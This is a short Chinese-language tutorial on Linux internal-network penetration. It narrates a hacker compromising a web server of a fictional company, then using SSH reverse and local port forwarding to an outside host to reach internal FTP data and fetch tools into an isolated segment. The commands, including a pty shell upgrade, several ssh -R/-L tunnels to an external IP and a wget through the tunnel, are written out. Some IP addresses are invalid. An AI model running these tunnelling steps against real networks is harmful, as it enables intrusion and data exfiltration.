linux内网渗透

在渗透测试过程中，经常遇到如下情形，内部网络主机通过路由器或者入侵了RISUN企业的一台服务器，机器名称为GBOSS_WEB

GBOSS_WEB信息：

外网IP：255.25.55.111

内网IP：10.168.0.10

网络架构方式为，路由将外网256.25.56.111的80端口映射到内网10.168.0.10的80端口上。



骇客A通过利用80端口开放服务的WEB脚本漏洞，成功继承到GBOSS_WEB的httpd权限，然后通过perl或者其它语言创建SOCKET获得一个远程shshell。由于back回来的shell可能不稳定，或者使用起来不方便，可以采用SSH建立一个隧道，将GBOSS_WEB服务器上的22端口映射至骇客的本机上(本文章用于演示的骇客机为0x.cn)；



通过得到的shshell，执行$python-c‘importpty;pty.spawn(”/bin/sh”)’获得一个ttyshell(因为ssh想要tty的支持)，然后通过如下命令，映射GBOSS_WEB服务器的22端口至202.65.208.142的44端口；

$ssh-C-f-N-g-R44:127.0.0.1:22ring04h@202.65.208.142

这样登录0x.cn的ssh服务，ssh-p44127.0.0.1等同于连接GBOSS_WEB的22端口。



骇客A通过利用操作系统系统提升权限至ROOT，再继续渗透过程中，发现内网还存在另外一台名称为GBOSS_APP的服务器。

GBOSS_APP信息：

内网IP：10.168.0.20



骇客通过嗅探获取了GBOSS_APP服务器的FTP信息，GBOSS_APP服务器FTP保存有RISUN企业的核心数据，由于数据量庞大，需要FTP续传功能，可通过SSH映射GBOSS_APP的21端口至0x.cn的2121端口；

$ssh-C-f-N-g-R2121:10.168.0.20:21ring04h@202.65.208.142



当骇客成功root掉内网中另一网段中的服务器BILL_APP时，需要从外网下载一些工具，由于内部访问控制策略，BILL_APP无法连接网，此时可以通过映射外网服务器0x.cn的80端口至GBOSS_WEB的8888端口，然后通过GBOSS_WEB建立的隧道，下载所需工具。

在GBOSS_WEB服务器上执行：

$ssh-C-f-N-guser@10.168.0.10-L8888:202.65.208.142:80



通过建立隧道后，在BILL_APP上执行wgethttp://10.168.0.10:8888/thepl等同于访http://202.65.208.142/thepl



本文详细的概述了如何建立隧道的过程，以及相关参数的使用方法，各位懂的高手可以直接飘过。

*